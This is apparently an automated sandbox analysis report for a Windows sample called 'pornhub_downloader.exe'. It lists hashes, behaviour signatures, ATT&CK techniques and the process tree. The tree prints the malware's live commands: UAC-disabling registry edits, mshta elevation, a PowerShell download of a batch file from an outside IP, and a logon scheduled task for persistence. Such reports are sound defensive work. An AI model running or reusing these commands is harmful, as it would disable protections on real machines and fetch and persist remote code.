Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28/09/2024, 11:49
Static task
static1
Behavioral task
behavioral1
Sample
pornhub_downloader.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
pornhub_downloader.exe
Resource
win10v2004-20240802-en
General
-
Target
pornhub_downloader.exe
-
Size
88KB
-
MD5
759f5a6e3daa4972d43bd4a5edbdeb11
-
SHA1
36f2ac66b894e4a695f983f3214aace56ffbe2ba
-
SHA256
2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
-
SHA512
f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
-
SSDEEP
1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 2688 powershell.exe -
pid Process 2688 powershell.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3568 attrib.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation pornhub_downloader.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation PORNHU~1.EXE -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 4000 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pornhub_downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PORNHU~1.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4352 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2688 powershell.exe 2688 powershell.exe 2408 msedge.exe 2408 msedge.exe 3908 msedge.exe 3908 msedge.exe 1808 identity_helper.exe 1808 identity_helper.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2688 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe 3908 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3096 wrote to memory of 4032 3096 pornhub_downloader.exe 84 PID 3096 wrote to memory of 4032 3096 pornhub_downloader.exe 84 PID 4032 wrote to memory of 4000 4032 cmd.exe 87 PID 4032 wrote to memory of 4000 4032 cmd.exe 87 PID 4000 wrote to memory of 3388 4000 mshta.exe 88 PID 4000 wrote to memory of 3388 4000 mshta.exe 88 PID 4000 wrote to memory of 3388 4000 mshta.exe 88 PID 3388 wrote to memory of 684 3388 PORNHU~1.EXE 89 PID 3388 wrote to memory of 684 3388 PORNHU~1.EXE 89 PID 684 wrote to memory of 2848 684 cmd.exe 91 PID 684 wrote to memory of 2848 684 cmd.exe 91 PID 684 wrote to memory of 2440 684 cmd.exe 92 PID 684 wrote to memory of 2440 684 cmd.exe 92 PID 684 wrote to memory of 3360 684 cmd.exe 93 PID 684 wrote to memory of 3360 684 cmd.exe 93 PID 684 wrote to memory of 5060 684 cmd.exe 94 PID 684 wrote to memory of 5060 684 cmd.exe 94 PID 5060 wrote to memory of 3532 5060 cmd.exe 95 PID 5060 wrote to memory of 3532 5060 cmd.exe 95 PID 684 wrote to memory of 3908 684 cmd.exe 96 PID 684 wrote to memory of 3908 684 cmd.exe 96 PID 684 wrote to memory of 3568 684 cmd.exe 97 PID 684 wrote to memory of 3568 684 cmd.exe 97 PID 3908 wrote to memory of 2760 3908 msedge.exe 98 PID 3908 wrote to memory of 2760 3908 msedge.exe 98 PID 684 wrote to memory of 2688 684 cmd.exe 99 PID 684 wrote to memory of 2688 684 cmd.exe 99 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 PID 3908 wrote to memory of 2724 3908 msedge.exe 100 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3568 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5E0E.tmp\5E0F.tmp\5E10.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\61F6.tmp\61F7.tmp\61F8.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"5⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2848
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2440
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:3360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"6⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command7⤵PID:3532
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd0fd646f8,0x7ffd0fd64708,0x7ffd0fd647187⤵PID:2760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 /prefetch:27⤵PID:2724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
PID:2408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:87⤵PID:1440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:17⤵PID:2348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:17⤵PID:2592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:17⤵PID:3976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:87⤵PID:1104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
PID:1808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:17⤵PID:1456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:17⤵PID:3924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:17⤵PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:17⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1856 /prefetch:27⤵
- Suspicious behavior: EnumeratesProcesses
PID:2156
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4352
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4284
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1212
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD52dc1a9f2f3f8c3cfe51bb29b078166c5
SHA1eaf3c3dad3c8dc6f18dc3e055b415da78b704402
SHA256dcb76fa365c2d9ee213b224a91cdd806d30b1e8652d72a22f2371124fa4479fa
SHA512682061d9cc86a6e5d99d022da776fb554350fc95efbf29cd84c1db4e2b7161b76cd1de48335bcc3a25633079fb0bd412e4f4795ed6291c65e9bc28d95330bb25
-
Filesize
152B
MD5e4f80e7950cbd3bb11257d2000cb885e
SHA110ac643904d539042d8f7aa4a312b13ec2106035
SHA2561184ee8d32d0edecddd93403fb888fad6b3e2a710d37335c3989cc529bc08124
SHA5122b92c9807fdcd937e514d4e7e1cc7c2d3e3aa162099b7289ceac2feea72d1a4afbadf1c09b3075d470efadf9a9edd63e07ea7e7a98d22243e45b3d53473fa4f0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize816B
MD53b8aae1408771ba514da9b4948f27da8
SHA1b2213ccfa4c7ec6c2d0fe44c75b77638ebb98638
SHA256051901fb272ac05974cf3e13982bbfb21524baf2d510ad19c08430da1f2c4984
SHA5124a3e8155f992c72abab7962b81fbf6ae055bd2b79a5bb3f9abd0400a1e63525ec316d5c370bf79f28ef2e4a4aa6a5f6cc171549e4d08ae11aabed0f0d0b97472
-
Filesize
1KB
MD546c7f5d449959bcec45c5b5d4c5cf6b1
SHA15c247ecb0124d34e5b6684c88c901d37e7e30be1
SHA256c7da5a0f8bd179485c6948b8eda6fa39a0c557cd894dd1218ea5ebce5133e3ec
SHA5126a19b64fadad93e398ec4881c05adc7f0d253249dc4eb063afbd254e240148e8421cf5d7c12fc90f5d4d66883ef34755ee814473705d38d20b5d36a60a51fc27
-
Filesize
5KB
MD5f0ffbb8d1550aaed39ce2c85cf15c6bf
SHA1a022baba3bcb61f681fd20a12c8848c98555c4e1
SHA256e1ed2f98219081718e3d989a33355548913b15173562c8d6c10cdcc4b88bf950
SHA512f5a4762197683c5311ff64596d30a426d33025adb2a977a33757f67a07f8b2ecb5be5769ae1aabc6a1bce244076eb8b8eade5c1fe6e384095a9d7009bebbf955
-
Filesize
6KB
MD5901450ef910ce5ade2cc92a5207c7032
SHA1e6e38fde6cea0289c8c2176e57d0a8c2bd1e1620
SHA2560c3980469ffefee509070afb9cd36de98eb08557561274c7df48a72264a930cb
SHA51225a04c888b4398ea3db1bc92964679640fa0193c68fef948a74ff6b190a1beaa471cd1ddca5143a61ff85b0b24cb80f8de847f6b2f16b28f5b9c5216d2e10657
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize96B
MD5f9b4be0b1d94e9caadc6ea4494dbf4fb
SHA1d79e2a4bcee3a5ecce5bc89f8d302ceffbe97997
SHA2569e4222c7a2c18c54bcb2460278bcdb8fe5233ba610b2e886afe7ca60cdab3d3e
SHA512653de47cb51cf2801e8fbfb97ef0df2997c529845c3f799461230e0ddff06d8ad781d6cef4429207a78cf3120c3e63d2fbac8ec24d4883d5698d7bc5886b09b3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57c18b.TMP
Filesize48B
MD53e13cf3264eec518a5c3a53c650ff025
SHA14e8ad27a535a684598cad23629cd3af9dca629c4
SHA2567f898cb091aa7ab44899c80ce3334ce9d711561778cf606154977dd1d9d26cca
SHA5125af2a33508915c1491a23148053b38db6a9954812c79509178a283790ec3a9cd75be5f8cc6a6c869f9601cd389aa54e1684bded06015013c5008679d8bafa126
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5d77502c02bd16d961e02e5e5d9275959
SHA150849736acff07042159e715750e29a98fa99c00
SHA2566ea12fb887414f90a2375bea2368cbeb36e1f6e13c11ff101c00f0054b65951a
SHA512839d1d110187a22a1e5e2b6db39927329b8d4c6078cbc3792fed00c11d880320e9a9f6d9582eaadfe943755e0a12191cfaaf7b567e260b3ca447d2718ab891d4
-
Filesize
1KB
MD59856d2fe29a28c54c5943c2150f7bae1
SHA1f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97
SHA2560b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999
SHA512002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82